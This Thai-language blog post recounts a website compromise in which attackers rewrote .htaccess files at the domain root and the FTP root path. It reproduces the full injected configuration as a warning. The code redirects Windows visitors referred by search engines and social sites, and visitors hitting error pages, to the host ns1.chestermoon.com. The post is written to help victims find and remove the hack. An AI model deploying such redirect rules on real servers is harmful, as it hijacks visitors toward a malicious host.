.htaccess Redirect Hack

ขอแชร์ประสบการ์ณเรื่องเว็บโดน Hack โดยการเขียนไฟล์ .htaccess ให้ Redirect ไปยังโดเมน http://ns1.chestermoon.com

อาการของมันคือเข้าหน้าบ้างหน้าได้ บ้างหน้ามันจะขึ้น Error แล้วก็จะฟ้องเรื่อง DNS อะไรสักอย่างเกี่ยวกับเว็บ http://ns1.chestermoon.com นี้ แต่บ้างครั้งมันจะไม่ฟ้องอะไรเลย เราก็จะต้องนั่งหาสาเหตุอยู่นานถึงจะมาเจอว่าไฟล์ .htaccess ถูกแก้ไข ขอเตือนไว้ก่อนว่ามันไม่ได้อยู่แค่ Root Domains มันขึ้นไปอยู่ใน Root Path ที่ FTP สามารถเข้าได้เลยครับ บ้างท่านอาจจะแก้แค่ Root Domains แต่มันจะไม่หาย เราต้องเข้าไปแก้ไฟล์ .htaccess Root Path ด้วยนะครับ จะลบไปหรือจะลบแค่ Code ของมันที่ทำงานก็แล้วแต่ครับ

อันนี้เป็น Code .htaccess Redirect ที่ผมโดนครับ ฝากไว้เป็นตัวอย่างให้ทุกท่านครับ

#
# DO NOT EDIT THIS FILE!
#

ErrorDocument 500 http://ns1.chestermoon.com/main.php?i=J8qoitQcr/Kijhj9UMNCwpEZ&e=0
ErrorDocument 502 http://ns1.chestermoon.com/main.php?i=J8qoitQcr/Kijhj9UMNCwpEZ&e=2
ErrorDocument 403 http://ns1.chestermoon.com/main.php?i=J8qoitQcr/Kijhj9UMNCwpEZ&e=3

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns1.chestermoon.com/main.php?e=r&h=%{HTTP_HOST}&i=J8qoitQcr/Kijhj9UMNCwpEZ [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* http://ns1.chestermoon.com/main.php?e=4&h=%{HTTP_HOST}&i=J8qoitQcr/Kijhj9UMNCwpEZ [R,L]

One thought on “.htaccess Redirect Hack”

  1. ตอนนี้ผมก็กำลังโดนตัวนี้เลยครับ ไม่รู้จะแก้ยังไง….เศร้าจริง

Comments are closed.

Wordpress Social Share Plugin powered by Ultimatelysocial